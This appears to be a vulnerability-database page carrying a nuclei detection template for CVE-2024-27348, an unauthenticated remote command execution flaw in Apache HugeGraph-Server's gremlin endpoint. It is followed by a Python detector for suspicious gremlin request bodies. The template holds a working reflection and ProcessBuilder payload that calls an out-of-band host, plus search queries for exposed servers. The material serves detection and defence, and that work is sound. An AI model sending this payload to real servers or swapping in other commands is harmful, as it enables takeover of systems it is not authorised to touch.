Apache HugeGraph-Server - Remote Command Execution

Reported 18 Jun 2026 12:11:27 by ProjectDiscovery. Type: nuclei. Source: github.com. 248 views.

Apache HugeGraph-Server has a high-severity remote command execution vulnerability in the gremlin component, affecting versions prior to 1.3.0.

id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  impact: |
    Unauthenticated attackers can execute arbitrary commands via the gremlin component in Apache HugeGraph-Server, potentially compromising the entire graph database system.
  remediation: |
    Update Apache HugeGraph-Server to version 1.3.0 or later.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.9921
    epss-percentile: 0.99929
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache,kev,vkev,vuln

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4b0a00483046022100837eb94a98c289092f5a9bdacdda059b45a4b75b843469ffbf0b5b00a679ff45022100eef2f864e9de7bb0a4e28c8110c532de1c532434825fbf6ce73bff08c1c641b9:922c64590222798bb761d5b6d8e72950
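A defender-side complement to the template, added here as an example that is neither part of the ProjectDiscovery template nor the Vulners page: a Python check that flags /gremlin request bodies carrying the reflection, process-spawning and thread-renaming primitives the probe above relies on. The 'METHOD PATH<TAB>BODY' log format and the sample traffic are constructed assumptions, not a HugeGraph log format.

```python
import json
import re

# Indicator groups that a legitimate Gremlin query sent to HugeGraph-Server should
# never contain; each mirrors one stage of the template's probe above.
INDICATORS = {
    "reflection": re.compile(r"Class\.forName\(|getDeclaredField\(|setAccessible\(|\.invoke\("),
    "process_exec": re.compile(r"ProcessBuilder|Runtime\.getRuntime\(\)|\.exec\("),
    "thread_rename": re.compile(r'Thread\.currentThread\(\).*?getDeclaredField\("name"\)', re.S),
}

def classify_gremlin(raw_body: str) -> dict:
    """Parse one /gremlin JSON body and report which indicator groups its script hits.
    Bodies that are not JSON or lack a string "gremlin" field are flagged as malformed."""
    try:
        script = json.loads(raw_body)["gremlin"]
    except (ValueError, KeyError, TypeError):
        return {"suspicious": True, "hits": ["malformed"]}
    if not isinstance(script, str):
        return {"suspicious": True, "hits": ["malformed"]}
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"suspicious": bool(hits), "hits": hits}

def scan_log(lines):
    """Return (index, hits) for every suspicious POST /gremlin request in a list of
    'METHOD PATH<TAB>BODY' lines (a constructed, assumed log format)."""
    findings = []
    for i, line in enumerate(lines):
        head, _, body = line.partition("\t")
        if head.strip() != "POST /gremlin":
            continue  # only the Gremlin endpoint is in scope for this check
        verdict = classify_gremlin(body)
        if verdict["suspicious"]:
            findings.append((i, verdict["hits"]))
    return findings

# Constructed sample traffic (not captured from any real deployment); entry 2 mirrors
# the reflection and ProcessBuilder stages of the template's probe.
SAMPLE_LOG = [
    "GET /versions\t",
    'POST /gremlin\t{"gremlin": "g.V().has(\'name\',\'marko\').out(\'knows\').values(\'name\')", "language": "gremlin-groovy"}',
    'POST /gremlin\t{"gremlin": "Thread t = Thread.currentThread();java.lang.reflect.Field f = t.getClass().getDeclaredField(\\"name\\");f.setAccessible(true);Class pb = Class.forName(\\"java.lang.ProcessBuilder\\");", "language": "gremlin-groovy"}',
    "POST /gremlin\tnot-json-at-all",
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG):
        print(f"SAMPLE_LOG[{idx}]: suspicious /gremlin body, indicators={hits}")
```

Enabling the authentication described in the remediation reference removes unauthenticated access to the endpoint; this check only adds visibility for requests that still reach it.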


Risk summary, current as of 04 Feb 2026 07:00: Vulners AI Score 9 (High risk); CVSS 3.1 9.8; EPSS 0.9921; SSVC (no value shown). 248 views.